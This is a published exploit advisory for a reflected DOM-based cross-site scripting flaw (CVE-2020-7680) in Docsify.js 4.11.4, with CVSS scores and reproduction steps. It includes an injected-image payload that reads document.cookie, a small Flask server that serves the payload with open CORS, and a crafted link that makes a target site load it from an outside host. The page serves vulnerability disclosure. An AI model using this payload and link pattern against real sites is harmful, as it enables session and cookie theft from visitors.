Docsify.js 4.11.4 Cross Site Scripting

2020.07.23
Credit: Amin Sharifi
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: Docsify.js 4.11.4 - Reflective Cross-Site Scripting # Date: 2020-06-22 # Exploit Author: Amin Sharifi # Vendor Homepage: https://docsify.js.org # Software Link: https://github.com/docsifyjs/docsify # Version: 4.11.4 # Tested on: Windows 10 # CVE : CVE-2020-7680 docsify.js uses fragment identifiers (parameters after # sign) to load resources from server-side .md files. it then renders the .md file inside the HTML page. For example : https://docsify.js.org/#/quickstart sends an ajax to https://docsify.js.org/quickstart.md and renders it inside the html page. due to lack of validation it is possible to provide external URLs after the /#/ and render arbitrary javascript/HTML inside the page which leads to DOM-based Cross Site Scripting (XSS). Steps to reproduce: step 1. setup a server (for example I use flask here, for the POC im hosting one on https://asharifi.pythonanywhere.com ) step 2. the server should respond to request to /README.md with a crafted XSS payload. here is the payload "Html Injection and XSS PoC</p><img src=1 onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>" also the CORS should be set so that other Origins would be able to send ajax requests to the server so Access-Control-Allow-Origin must be set to * (or to the specific domain that you wanna exploit) example code below: ------------------------------------------------- from flask import Flask import flask app = Flask(__name__) @app.route('/README.md') def inject(): resp = flask.Response("Html Injection and XSS PoC</p><img src=1 onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>") resp.headers['Access-Control-Allow-Origin'] = '*' return resp ------------------------------------------------------ step 3. craft the link for execution of the exploit for example for https://docsify.js.org website you can create the link as below https://docsify.js.org/#//asharifi.pythonanywhere.com/README (note that the mentioned domain is no longer vulnerable at the time writing this report) when a user visits this URL an ajax request will be sent to asharifi.pythonanywhere.com/README.md and the response of the request will be rendered inside the webpage which results in XSS payload being executed on the page. snyk advisory: https://snyk.io/vuln/SNYK-JS-DOCSIFY-567099 Mitre CVE entry: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7680


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top